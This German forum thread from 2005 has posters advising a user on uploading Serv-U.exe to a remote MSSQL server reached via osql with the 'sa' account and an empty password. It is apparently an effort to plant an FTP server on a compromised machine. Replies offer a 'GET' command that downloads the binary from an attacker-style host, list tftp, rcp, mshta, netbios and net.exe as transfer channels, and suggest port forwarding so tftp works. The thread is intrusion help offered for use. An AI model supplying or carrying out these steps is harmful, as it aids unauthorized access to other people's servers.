Datein per OSQL senden ?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von and1theReal, 27. Oktober 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 27. Oktober 2005
    Hi,

Wie lautet der Befehl um Dateien per osql.exe auf einen mssql Server zu schicken ?

Das hab ich bis jetzt gefunden ...

osql.exe -S IP -U sa -P "" .....

Wie geht es dann weiter um zb. die Datei Serv-U.exe auf einen Server zu laden ?

Die dateien liegen bei mir auf der Platte...will sie also von mir aus auf den Server laden, da die ftp.exe fehlt.

2. Anzeige
  3. #2 27. Oktober 2005
    noch nie mit osql befasst, weiss auch nicht genau ob das überhaupt möglich ist per osql dateien hochzuladen ?

Andere Möglichkeit wäre, du versuchst deine files per rcp.exe (du brauchst dafür QVTNET32) oder tftp.exe (du brauchst TFTP Server) oder "GET" command.

Der GET command funktioniert sehr einfach :

GET http://www.evil.net/servu.exe > servu.exe

und voila die file ist in dem verzeichnis gespeichert, wo du dich gerade befindest

4. #3 27. Oktober 2005
    ham nedmal 10% der win installationen...des weitren

inline transfer geht mit osql
    rcp auch
    mshta auch
    netbios auch
    via rpc auch
    via net.exe
    via IE

mfg moep

5. #4 27. Oktober 2005
    kannste ma bidde erklären, wies per net geht? wär um antwort dankbar :)

6. #5 28. Oktober 2005
    Hi,

Geht es mit osql ? Könnt ihr mir bitte den Befehl sagen oder die Befehle zu ein paar anderen Methoden ?

Ich sitze hinter einem Router, deswegen funktioniert die tftp Methode nicht. Notfalls müsste ich kurz den Router wegmachen...

7. #6 28. Oktober 2005
    forwarde doch einfach den port, den tftp benutzt (guck halt mit fport) und dann los ^^

8. Videos zum Thema
Die Seite wird geladen...